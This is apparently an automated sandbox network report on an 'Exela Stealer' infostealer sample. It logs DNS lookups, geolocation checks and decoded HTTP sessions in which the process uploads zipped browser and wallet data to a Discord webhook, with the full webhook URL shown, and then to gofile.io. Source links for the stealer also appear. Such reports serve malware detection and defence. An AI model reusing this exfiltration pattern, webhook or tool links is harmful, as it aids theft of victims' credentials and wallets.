                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.962241888 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.963247061 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.963340044 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.965181112 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.965236902 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.965481997 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.965486050 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.015216112 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.229044914 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.229124069 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.229185104 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.229633093 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.229645014 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.463926077 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.464021921 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.464109898 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.464692116 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.464728117 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.092888117 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.093635082 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.093692064 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.094691038 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.094867945 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.096430063 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.096431017 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.096517086 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.096654892 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.097393990 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.097436905 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.100251913 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.100328922 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.100547075 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:25.100605011 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.230052948 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.230149031 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.230804920 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.231087923 CET49759443192.168.2.445.112.123.227
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.231126070 CET4434975945.112.123.227192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.233835936 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.233860970 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.234075069 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.234628916 CET49760443192.168.2.4162.159.137.232
Jan 1, 2025 02:53:27.234642982 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.688884020 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.690021992 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.690030098 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.691143990 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.691206932 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.700825930 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.700903893 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.701138973 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.701147079 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.701196909 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.747332096 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.750382900 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.905929089 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.906047106 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Jan 1, 2025 02:53:27.906088114 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.906599998 CET | 49760 | 443 | 192.168.2.4 | 162.159.137.232
Jan 1, 2025 02:53:27.906614065 CET | 443 | 49760 | 162.159.137.232 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 02:53:05.372723103 CET | 57846 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 02:53:05.379848957 CET | 53 | 57846 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 02:53:19.611917019 CET | 61321 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 02:53:19.619671106 CET | 53 | 61321 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 02:53:23.327610970 CET | 53371 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 02:53:23.335537910 CET | 53 | 53371 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 02:53:24.455741882 CET | 60300 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 02:53:24.462455988 CET | 53 | 60300 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 02:53:05.372723103 CET | 192.168.2.4 | 1.1.1.1 | 0x24df | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:19.611917019 CET | 192.168.2.4 | 1.1.1.1 | 0x32bc | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:23.327610970 CET | 192.168.2.4 | 1.1.1.1 | 0x1088 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:24.455741882 CET | 192.168.2.4 | 1.1.1.1 | 0x30df | Standard query (0) | store1.gofile.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 02:53:05.379848957 CET | 1.1.1.1 | 192.168.2.4 | 0x24df | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:16.496896029 CET | 1.1.1.1 | 192.168.2.4 | 0xd629 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:16.496896029 CET | 1.1.1.1 | 192.168.2.4 | 0xd629 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:19.619671106 CET | 1.1.1.1 | 192.168.2.4 | 0x32bc | No error (0) | canary.discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:19.619671106 CET | 1.1.1.1 | 192.168.2.4 | 0x32bc | No error (0) | canary.discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:19.619671106 CET | 1.1.1.1 | 192.168.2.4 | 0x32bc | No error (0) | canary.discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:19.619671106 CET | 1.1.1.1 | 192.168.2.4 | 0x32bc | No error (0) | canary.discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:19.619671106 CET | 1.1.1.1 | 192.168.2.4 | 0x32bc | No error (0) | canary.discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:23.335537910 CET | 1.1.1.1 | 192.168.2.4 | 0x1088 | No error (0) | api.gofile.io |  | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:53:24.462455988 CET | 1.1.1.1 | 192.168.2.4 | 0x30df | No error (0) | store1.gofile.io |  | 45.112.123.227 | A (IP address) | IN (0x0001) | false
• canary.discord.com
• api.gofile.io
• store1.gofile.io
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 208.95.112.1 | 80 | 3512 | C:\Users\user\Desktop\rename_me_before.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:53:05.393385887 CET | 124 | OUT | GET /json HTTP/1.1
    Host: ip-api.com
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.11 aiohttp/3.9.5
Jan 1, 2025 02:53:05.850951910 CET | 483 | IN | HTTP/1.1 200 OK
    Date: Wed, 01 Jan 2025 01:53:05 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 306
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
                                                                                                                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49751 | 162.159.137.232 | 443 | 3512 | C:\Users\user\Desktop\rename_me_before.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:53:20 UTC | 284 | OUT | POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
    Host: canary.discord.com
    Content-Type: application/json
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.11 aiohttp/3.9.5
    Content-Length: 1381
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC1381OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30
                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Exela Stealer Full Info***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0
2025-01-01 01:53:20 UTC | 1335 | IN | HTTP/1.1 204 No Content
    Date: Wed, 01 Jan 2025 01:53:20 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    CF-Ray: 8faee004fb481a1b-EWR
    CF-Cache-Status: DYNAMIC
    Set-Cookie: __dcfduid=2d3dff6cc7e311efa7382e571129ae1c; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    X-Content-Type-Options: nosniff
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1735696401
    x-ratelimit-reset-after: 1
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wr7EJh1y8dL%2Fw3V6th3UbKgC2H3xLiEvpCLAZWPC%2Bh9QjRx7vs4e8JXKHYVmD8tJugSkpn9iFKfDFJemiciqumpvxQO0xdxy%2FrWLocp9QRpo21%2Fo00Q2AH8zZi8ueZWSwYqxNA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
    Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC536INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 32 64 33 64 66 66 36 63 63 37 65 33 31 31 65 66 61 37 33 38 32 65 35 37 31 31 32 39 61 65 31 63 61 31 30 65 31 32 62 35 66 33 63 37 37 31 64 38 64 65 34 31 35 38 65 34 62 66 39 61 38 35 61 61 33 34 32 64 36 64 61 64 66 33 38 36 63 38 30 66 34 35 34 37 36 61 34 39 38 32 35 33 66 39 66 33 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 33 31 2d 44 65 63 2d 32 30 32 39 20 30 31 3a 35 33 3a 32 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 36 66 64 31 34 33 36 31 35 63 31 62 33 36 35
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: __sdcfduid=2d3dff6cc7e311efa7382e571129ae1ca10e12b5f3c771d8de4158e4bf9a85aa342d6dadf386c80f45476a498253f9f3; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fd143615c1b365


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49752 | 162.159.137.232 | 443 | 3512 | C:\Users\user\Desktop\rename_me_before.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:53:20 UTC | 283 | OUT | POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
Host: canary.discord.com
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.9.5
Content-Length: 512
2025-01-01 01:53:20 UTC | 512 | OUT | Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Keyword Result***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thum
2025-01-01 01:53:20 UTC | 1335 | IN | HTTP/1.1 204 No Content
Date: Wed, 01 Jan 2025 01:53:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 8faee0093d53ef9f-EWR
CF-Cache-Status: DYNAMIC
Set-Cookie: __dcfduid=2da62d44c7e311efa50d1a16210c25e5; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
alt-svc: h3=":443"; ma=86400
X-Content-Type-Options: nosniff
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1735696402
x-ratelimit-reset-after: 1
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ERtB40tEwrVmx%2BU3q8vFhVSsfILES8xlOChWYSNsrUCTs4QHjuJ9DCYvS1IRb2fPAriCdPmoqI7TZ3fhzQCbch%2F1n%2FkotbyIQh%2FbVIYex2FARR9FpUaenNrGxPtuYlp5tQTMgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
2025-01-01 01:53:20 UTC | 536 | IN | Data Ascii: Set-Cookie: __sdcfduid=2da62d44c7e311efa50d1a16210c25e59b4d6cb7ad22c0509d54c59f0ab098a4bb7e8152e5a7be173bd85d8d285f5f28; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=6fd143615c1b365


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49753 | 162.159.128.233 | 443 | 3512 | C:\Users\user\Desktop\rename_me_before.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:53:21 UTC | 640 | OUT | POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
Host: canary.discord.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.9.5
Cookie: __cfruid=6fd143615c1b365a93488760119253c0efeca9f1-1735696400; __dcfduid=2d3dff6cc7e311efa7382e571129ae1c; __sdcfduid=2d3dff6cc7e311efa7382e571129ae1ca10e12b5f3c771d8de4158e4bf9a85aa342d6dadf386c80f45476a498253f9f3; _cfuvid=f9Zo6kGhFwLLlRf0gmTxz4znRm14ReN4oWDuv3iy1Uo-1735696400253-0.0.1.1-604800000
Content-Length: 707818
Content-Type: multipart/form-data; boundary=7c58c6790e0e42f1b4146154278816b7
2025-01-01 01:53:21 UTC | 36 | OUT | Data Ascii: --7c58c6790e0e42f1b4146154278816b7
2025-01-01 01:53:21 UTC | 140 | OUT | Data Ascii: Content-Type: application/octet-stream
Content-Disposition: form-data; name="file"; filename="71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip"
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Ascii: PKYBrowsers/PKYWallets/PKY(5xDisplay (1).pngTy<T}flFEe7"M!FA*K%d7)d{ded*XB},w91u]z'Xn:p`Tmn?u_H
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:21 UTC | 16384 | OUT | Data Raw:
2025-01-01 01:53:22 UTC | 1244 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:53:22 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
CF-Ray: 8faee00d6e3d5e5f-EWR
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Vary: Accept-Encoding
Via: 1.1 google
alt-svc: h3=":443"; ma=86400
X-Content-Type-Options: nosniff
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1735696403
x-ratelimit-reset-after: 1
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9AxlDavcNZnRuBniLiUgaUn%2B%2BKVjr%2BqPn9bJkzC6y6NWvPgg%2B%2FsBpGxzfc%2FxIjT9EkUufLks7XxeS5UFyeqj0E4x5Q2OfFDaZCGhC2DBKhIcGDaX1%2FGQCmSoieXwKrnurskGcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Server: cloudflare


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49758 | 45.112.123.126 | 443 | 3512 | C:\Users\user\Desktop\rename_me_before.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:53:23 UTC | 132 | OUT | GET /getServer HTTP/1.1
Host: api.gofile.io
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.9.5
2025-01-01 01:53:24 UTC | 1113 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.1
Date: Wed, 01 Jan 2025 01:53:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
2025-01-01 01:53:24 UTC | 14 | IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
Data Ascii: error-notFound


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49759 | 45.112.123.227 | 443 | 3512 | C:\Users\user\Desktop\rename_me_before.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:53:25 UTC | 238 | OUT | POST /uploadFile HTTP/1.1
Host: store1.gofile.io
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.9.5
Content-Length: 79291
Content-Type: multipart/form-data; boundary=ff19e8851a3248b39599ce8f448c0a96
2025-01-01 01:53:25 UTC | 36 | OUT | Data Raw: 2d 2d 66 66 31 39 65 38 38 35 31 61 33 32 34 38 62 33 39 35 39 39 63 65 38 66 34 34 38 63 30 61 39 36 0d 0a
Data Ascii: --ff19e8851a3248b39599ce8f448c0a96
2025-01-01 01:53:25 UTC | 127 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 0d 0a 0d 0a
Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"
2025-01-01 01:53:25 UTC | 16384 | OUT | Data Raw: 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 44 54 42 5a 47 49 4f 4f 53 4f 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4f 4e 42 51 43 4c 59 53 50 55 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 55 4d 4d 42 44 4e 45 51 42 4e 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59
Data Ascii: PKYDTBZGIOOSO/PKYDesktop/PKYDocuments/PKYDownloads/PKYONBQCLYSPU/PKYUMMBDNEQBN/PKY
